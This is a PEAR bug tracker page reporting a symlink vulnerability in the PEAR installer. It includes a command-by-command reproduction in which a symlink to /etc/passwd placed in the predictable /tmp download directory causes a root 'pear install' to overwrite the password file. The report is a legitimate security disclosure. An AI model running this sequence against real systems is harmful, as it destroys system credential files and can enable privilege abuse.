Package home | Report new bug | New search | Development Roadmap Status: Open | Feedback | All | Closed Since Version 1.10.13

Bug #18055 [SECURITY]: Symlink attack
Submitted: 2010-11-14 20:24 UTC
From: ondrej Assigned:
Status: Duplicate Package: PEAR (version 1.9.1)
PHP Version: 5.3.3 OS: Linux
Roadmaps: (Not assigned)    
Subscription  
Comments Add Comment Add patch


Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know! Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
MUST BE VALID
Solve the problem : 28 + 5 = ?

 
 [2010-11-14 20:24 UTC] ondrej (Ond?ej Surý)
Description: ------------ There's symlink vulnerability when doing PEAR install. PEAR should really be using $(mktemp) for it's directories like download_dir, cache_dir and tmp_dir, and check whether the directory doesn't exists. Test script: --------------- # pear config-show | grep /tmp PEAR Installer cache directory cache_dir /tmp/pear/cache PEAR Installer download download_dir /tmp/buildd/php5-5.3.3/pear-build-download PEAR Installer temp directory temp_dir /tmp/pear/temp # ls -ld /tmp/buildd/php5-5.3.3/pear-build-download drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download # su - ondrej $ cd /tmp/buildd/php5-5.3.3/pear-build-download $ ln -s /etc/passwd package.xml $ cat package.xml root:x:0:0:root:/root:/bin/bash [...] $ logout # pear install Net_Socket downloading Net_Socket-1.0.10.tgz ... Starting to download Net_Socket-1.0.10.tgz (5,429 bytes) .....done: 5,429 bytes install ok: channel://pear.php.net/Net_Socket-1.0.10 # head /etc/passwd <?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.9.1" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>Net_Socket</name> <channel>pear.php.net</channel> <summary>Network Socket Interface</summary> <description>Net_Socket is a class interface to TCP sockets. It provides blocking and non-blocking operation, with different reading and writing modes (byte-wise, block-wise, line-wise and special formats like network byte-order ip addresses).</description> <lead> Expected result: ---------------- Not overwriting system files. Not vulnerable to symlink attack. Actual result: -------------- Overwritten /etc/passwd just by creating right directories and symlinks.

Comments

 [2010-11-16 04:41 UTC] dufuz (Helgi Þormar Þorbjörnsson)
-Status: Open +Status: Duplicate
 [2015-10-20 09:14 UTC] sathieu (Mathieu Parent)
Hello, This bug is marked as duplicate. But duplicate of what?
 [2015-10-20 09:24 UTC] cweiske (Christian Weiske)
Duplicate of bug #18056.